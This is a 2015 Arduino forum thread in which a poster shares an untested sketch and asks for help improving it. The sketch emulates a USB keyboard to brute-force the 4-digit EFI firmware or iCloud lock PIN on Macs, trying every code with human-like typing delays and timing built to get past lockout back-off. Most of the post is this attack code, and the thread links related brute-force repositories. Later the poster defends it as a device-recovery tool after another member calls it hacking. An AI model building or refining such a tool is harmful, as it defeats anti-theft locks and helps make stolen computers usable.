Go Down

Topic: Revisiting orvtech's EFI Firmware & iCloud unlock for Macs (Read 146 times) previous topic - next topic

Somerset

May 24, 2015, 07:33 am Last Edit: May 24, 2015, 08:37 am by Somerset Reason: added code select
This sketch has been kicked around and modified for years. I would first like to thank orvtech, knoy, Ivan Mendoza, Anaruz, evasoft, yixiy, amora, and all of the others that developed and helped improve this sketch along the way (sorry to those I didn't mention). The original version was written for use with Teensy 3.0 and then later scripted for Arduino Leonardo. The best part of these sketches is they turn bricks back into the useful machines they were intended to be. The worst part of these sketches are the lack of convenience including having to watch the display, the clock, and ultimately work out the attempts over time to actually retrieve what the sketch was written for. Finally, the sketch has been utilized to make companies (and individuals) hundreds of dollars. Devices and "services" are sold on eBay for $60-$100. NerdsArmy even has several versions - the top of the line costing around $450.
My intention is to have great minds working on this again to include the best features at the lowest cost. Instead of the Teensy 3.1 version that leaves you to set up a video recorder, run calculations, and possibly run additional, modified attempts to get to the goal - I think the ultimate device would include the necessary keyboard strokes, mouse movements and clicks, LCD display of counter, and the ability to stop when finished - possibly utilizing a microphone to listen for a reboot chime (if applicable), or a light sensor that can detect the screen change, or by being aware of a USB hardware check.
I don't know the entire Arduino catalog but I'm envisioning the Leonardo with LCD shield for this task. I'm not really concerned with the increase in size and cost but more efficiency and functionality.
I am new to this whole environment and have no knowledge of writing code. I haven't produced or utilized any devices (though I plan to). I've spent more time with hardware and repair which has lead me on this search. I've read many blogs and found there is a lot of great information scattered all around but no convenient one-stop-shop for those who are interested in producing their own, quality, working device with a step-by-step tutorial. Perhaps the community mindset is "if you can't labor through hours, days, and years of blogs and put you're own blood and sweat in - then you simply don't deserve it".
Anyway....The "base" sketches can be retrieved from GitHub.
Here is something I've compiled but it hasn't been tested and more than likely does not work - just a concept or a theory. (Note: it doesn't yet include anything to stop the count when goal is met). Please forgive my ignorance.

Code: [Select]


#include <usb_keyboard.h>
#include <LiquidCrystal.h>
LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
//waits for iCloud
int loops = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {

lcd.begin(16, 2);
lcd.print("CODE INPUT");
pinMode(ledPin, OUTPUT); // declare LED as output
delay(30000);
Mouse.begin();
}

void loop(){
//lets wait 1 minute and 1 second
  if (loops == 5){
  delay(61000);
}
//lets wait 5 minutes and one second
  else if (loops == 6){
  delay(301000);
}
//lets wait 15 minutes and 1 second
  else if (loops == 7){
  delay(901000);
  loops = 0;
}
//lets get to work
if (counter <= 9999){
  delay(1500); // vs (8000)
  digitalWrite(ledPin, LOW);
  Mouse.click();
  delay(800); // vs (5500)
  digitalWrite(ledPin, HIGH);
  sprintf(pin, "%04d", fakecounter);
  //sending first digit
  Keyboard.press(pin[0]);
  delay(450);
  Keyboard.release(pin[0]);
  delay(420);
  //sending second digit
  Keyboard.press(pin[1]);
  delay(398);
  Keyboard.release(pin[1]);
  delay(510);
  //sending third digit
  Keyboard.press(pin[2]);
  delay(421);
  Keyboard.release(pin[2]);
  delay(423);
  //sending fourth digit
  Keyboard.press(pin[3]);
  delay(430);
  Keyboard.release(pin[3]);
  delay(525);
  //sending return
  Keyboard.press(KEY_RETURN);
  delay(305);
  Keyboard.release(KEY_RETURN);

  lcd.setCursor(0, 1);
  lcd.print(pin[0]);
  lcd.setCursor(1, 1);
  lcd.print(pin[1]);
  lcd.setCursor(2, 1);
  lcd.print(pin[2]);
  lcd.setCursor(3, 1);
  lcd.print(pin[3]);

}

//reached 4 digit PIN max value
if (counter > 9999){
  for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
  }
  delay(6000);
}
++counter;
++loops;
fakecounter = counter;
}



Please keep replies and comments relevant and useful.
Thank you.

JimboZA

#1
May 24, 2015, 07:38 am Last Edit: May 24, 2015, 07:38 am by JimboZA
First relevant and useful reply: please edit the post and put the code inside
[code]code here[/code] tags so that

Code: [Select]
it looks
{
like this
}


While you're at it, you might like to give the thread a title that actually gives some info.
meArm build blog:     http://jimbozamearm.blogspot.com/

Please don't PM for technical advice. Firstly my advice is sometimes wrong, and second, in the forum you get a broader, more timely, range of responses.

UKHeliBob

OK, I give up, what is the purpose of the program ?
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.

Somerset


JohnLincoln

Even with the change of title, I am still non the wiser.


You have shown us a sketch, that you say is untested.

We don't know what it is supposed to do.

Even if we were to test it for you, how would we know whether it was a pass/fail?

Somerset

The "device" is supposed to enter (as a USB HID) the 10,000 possibilities of a 4-digit numeric code with delays built in to copy human typing. It also applies mouse movements and/or clicks to keep the computer from going to sleep. (Some variations call for a restart of the computer at certain intervals). In the early stages the sketch only allowed for the keystrokes and the user would have to watch along or set up a video camera, along with a timer, to capture when the code was finally entered correctly. The user would then have to figure how many attempts were made over the period of time and do the math to get close to the code to manually type entries until the exact match was found. Sometimes this also meant running the device again with a narrowed range. Later the sketch allowed for an LCD to display the number that was being entered. This made it easier, since the user didn't have to do the calculations, but the user still had to record the process - as it takes roughly 2 days to enter all 10,000 possibilities. Though the numbers were being displayed, however, the process would keep running even after the correct code was entered. Thus the need for coming up with a way to stop the device - via microphone, light sensor, etc.
Keep in mind this was originally written (and seemed to work best) with the Teensy 3.0 or 3.1. Some have used Arduino Leonardo and that is what I am hoping to build on.

Please allow me to post some links that may help with the explanation:

http://forum.arduino.cc/index.php?topic=209030.0

http://forum.arduino.cc/index.php?topic=198508.15

http://forum.arduino.cc/index.php?topic=187304.15

https://github.com/orvtech/efi-bruteforce

https://github.com/knoy/iCloudHacker/

http://iivanmendozaa.blogspot.com/2014/11/automated-brute-force-pin-lock-for.html

Thank you for your time and interest.

UKHeliBob

So this is an attempt to write program to hack an iCloud account.
Please do not send me PMs asking for help.  Post in the forum then everyone will benefit from seeing the questions and answers.

Somerset

Let's call it a retrieval device. I do not condone the theft of property or information. In my experience repairing machines, there are many items that are sold online (eBay) that are locked. Just because an item in locked doesn't mean it was stolen. Some of these items could be lost or the rightful owner has past away or simply forgot the firmware password and could not provide all of the necessary information to Apple to unlock them. Apple has become very strict in this regard. What do they care about bricked devices - that just means they're more able to sell new products.
Again, I do not condone any illegal activity or misuse of this device.

Go Up
 


Please enter a valid email to subscribe

Confirm your email address

We need to confirm your email address.
To complete the subscription, please click the link in the email we just sent you.

Thank you for subscribing!

Arduino
via Egeo 16
Torino, 10131
Italy